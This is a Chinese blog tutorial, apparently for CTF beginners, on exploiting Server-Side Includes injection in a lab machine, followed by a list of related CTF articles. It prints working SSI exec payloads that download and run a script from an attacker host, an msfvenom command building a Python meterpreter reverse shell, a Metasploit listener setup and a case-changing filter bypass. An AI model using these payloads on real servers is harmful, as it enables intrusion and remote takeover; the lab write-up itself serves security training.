6-4CTF夺旗入门教程--SSI注入

最新推荐文章于 2022-02-21 01:42:54 发布
最新推荐文章于 2022-02-21 01:42:54 发布
阅读量432 收藏 2
点赞数
分类专栏: CTF学习 文章标签: 安全 linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105442690
版权
1.SSI注入攻击介绍

SSI的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应结果。
如果网站目录中出现了.stm,.shtm,.shtml,并且网站对于SSI的输入没有做到严格过滤,很有可能被SSI注入攻击。

2.信息探测
#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.119
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.119
#探测敏感信息
nikto -host http://192.168.2.119
3.深入挖掘

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4.漏洞利用

页面中带有POST参数的地方
在这里插入图片描述
尝试提交:
在这里插入图片描述
服务器返回结果:
在这里插入图片描述
查看结果判断exec被过滤,尝试使用!+ EXEC
返回结果:
在这里插入图片描述

#列举当前目录中的文件和目录
<!--#exec cmd="ls" -->
#切换到指定目录
<!--#exec cmd="cd/root/dir">
#下载shell脚本并运行
<!--#exec cmd="wget http://192.168.2.110/shell.py" -->
5.制作webshell

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.2.110 lport=4444 -f raw > /root/Desktop/shell.py

#启动监听
msf> use exploit/multi/handler
>set payload python/meterpreter/reverse_tcp
>set lhost 192.168.2.110
>set lport 4444
>run

#在攻击机开启web服务,后续命令从攻击机访问下载shell
mv shell.py  /var/www/html/
service apache2 start

#下载shell脚本并运行
<!--#exec cmd="wget http://192.168.2.110/shell.py" -->
<!--#EXEC cmd="chmod 777 shell.py" --> 
<!--#EXEC cmd="python shell.py" -->
6.执行操作
sysinfo 查看系统信息
shell 进入系统shell
#优化终端
python -c "import pty;pty.spawn('/bin/bash')"

后续仍需提权等查找flag操作

7.总结

在CTF比赛中,对于SSI漏洞服务器具有很多过滤机制,需要进行绕过,如大小写

The Riddler.
关注
专栏目录
CTF夺旗-教程
mutou990的博客
08-08 2045
3.CTF-SSH私钥泄露 #locate ssh2john//通过locate命令查找到ssh2john在文件中的位置,直接用python执行即可 "john后回显无密码"问题的解决 知识点:赋权;ssh登录;栈溢出(缓冲区溢出提权); 2 4.CTF夺旗-SSH服务渗透(拿到第一个用户权限) ...
网络安全CTF夺旗赛入门到入狱-入门介绍篇
qq_45149716的博客
12-06 9921
哈喽大家好,我是菜鸡林某。今天起我会给大家不定期的带来CTF的入门教程(鄙人也是个CTF萌新请大佬见谅) CTF介绍&赛制&题型 CTF入门思路 CTF工具环境安装 CTF工具安装介绍 一,什么是CTF CTF全称Capture The Flag,直译为“夺旗赛”,起源于1996年举办的DEF CON全球黑客大会,最早是交流安全技术的重要途径。随着时间的推移,CTF 竞赛逐渐演变成为信息安全技术竞赛的一种形式,发展成为全球范围网络安全圈 的流行比赛,但其比赛形式与内容依然拥有浓厚的黑客
几道webCTF——命令绕过
辰星的博客
03-14 1301
第一题无回显类型 这里的exec函数会把参数cmd的值当做命令执行,并且没有任何过滤和限制。 对于这种无回显的题目,我们可以选择重定向符>来查看和获取信息。 我们先使用cmd=ls>info然后查看info来获取当前路径下的文件信息,如下: 发现flag.php,我们再次使用重定向符把其内容写入一个文件,再读取这个文件即可,即使用cmd=cat fl*>info,再次前往页面查...
CTF-SSI注入攻击
Reaches_r的博客
08-06 537
前言:SSI介绍 SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssi来执行系统命令,并返回对应的结果。 如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于ssi的输入没有做到严格过滤,很有可能被ssl注入攻击。 1.用dirb和nikto扫描,收集有用信息。很明显可以判断有ssi漏洞 2.看看这个index文件,是一个命令行,这时开始寻找注入点 3.发现首页有个可以输入的地方,feedback(反馈)肯定是个注入点..
CTF-SSI注入
su__xiaoyan的博客
12-25 326
SSI注入 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于CGI,用于执行动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码
小白学习CTF第九天-web安全(SSL注入)
bbhh1139的博客
04-21 1903
ssl注入 ssl注入介绍 简单了解一下ssl注入攻击: 信息探测 这个与之前的都一样: 接下来要根据扫描的道德信息,进行漏洞利用 漏洞利用 可以尝试打开一些比较敏感的位置: 像这个就是禁止访问的,我们就可以忽略了,但是有的时候我们也要查看网页源代码看看是否有关键信息。 打开这个可以看我不让我们访问的目录,尝试访问,下载对应的文件,看看有没有关键信息。 可以把这两个文件都下载了...
stripe-ctf-2.0:夺旗
05-19
压缩包文件"stripe-ctf-2.0-master"很可能包含了所有挑战的源代码和相关资源。通过分析这些代码,我们可以学习到如何设计安全挑战,了解攻击者可能会使用的技巧,同时也能提高自己的防御能力。例如,开发者可能会...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
【转】CTF-All-In-One(CTF从入门到放弃)pdf
03-20
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”
CTF 入门指导教程
12-04
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。
ctf web解题 找flag夺旗赛概述、原理及应用.pdf
05-13
### CTF Web解题 找flag夺旗赛概述、原理及应用 #### 一、概述 CTF(Capture The Flag,夺旗赛)是网络安全领域内一种极为流行的竞赛形式,尤其是在Web安全领域。这种竞赛模式旨在模拟真实世界的网络安全挑战,...
CTF练习(3)-这个看起来有点简单!(SQL注入
qq_35097943的博客
03-19 482
一、打开题目链接 题目链接:http://www.shiyanbar.com/ctf/33 看到一个表格,很容易联想到数据库,不过还是从源码看起 源码中是一个简单的table表格,看到代码中含有’1’,那么再看URl:http://ctf5.shiyanbar.com/8/index.php?id=1,id = 1? 可以分析出这可能是一个SQL注入点。 SQL注入:就是前端通过提...
[CTF]命令执行无回显利用
cosmoslin的博客
02-21 8825
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
MS SQL注入碰到关键词被过滤后的解决思路
收集盒 Book box
09-06 1058
declare、xp_、sp_、select、update、insert等关键词被过滤了。幸好单引号没有过滤。 EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') 当xp_被过滤了,declare也被过滤了。什么鸟
ctf从入门到放弃:SQL漏洞的常见防范190510
爱党人士
05-11 268
SQL Inject注入漏洞的防范:  代码层面 对输入进行严格的转义和过滤 使用预处理和参数化(Parameterized )  网路层面 通过WAF设备启用防SQL Inject注入策略(或类似防护系统) 云端防护(360网站卫士,阿里云盾等) 代码层面: PHP防范转义+过滤 但其实效果并不是太好。 因为数据库版本会更新的, 已更新后可能会产生新的函数,新的语法, 那么就意味着...
CTF中RSA常用攻击方法真题及脚本汇总
热门推荐
test
10-08 1万+
前言 具体的思路在上一篇博文中,这一篇主要整理题型和相应脚本。思路上一篇博文地址 代码不精,部分参考其他道友的代码。慢慢更新。 可能会遇见的问题 如果缺少某些模块,例如gmpy2,请自行百度或者goolge下载办法。linux可以参考这篇博文 。 代码中的gmpy模块的gmpy.root与gmpy2.iroot基本可以互换。 部分代码只能在python2.x环境中运行,因为某些模块没有相应的py...
CTF夺旗-sql注入(get)
qq_43776408的博客
03-10 829
1. 结果 2. -T4最快速度扫描 -A 加载所有模块 -v 以一种尽可能详细的方式显示 3. 上张图片的黄色的部分,就是目标的网站的登录页面 你可以在历览器中访问这个页面 4. 这个软件是kali自带的 5. 5. ...
CTF常见web密码学攻击方式(转载)
a3320315的博客
02-17 967
【技术分享】常见的Web密码学攻击方式汇总 对字节反转攻击的深入研究
新手指南:CTF夺旗赛入门与知名团队解析
CTF(Capture The Flag,中文常称为夺旗赛)是一种网络安全竞赛活动,起源于1996年的DEFCON全球黑客大会,其目的是让网络安全技术人员在一种安全可控的环境中展示技能,而不是通过实际攻击彼此。这种比赛形式取代了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值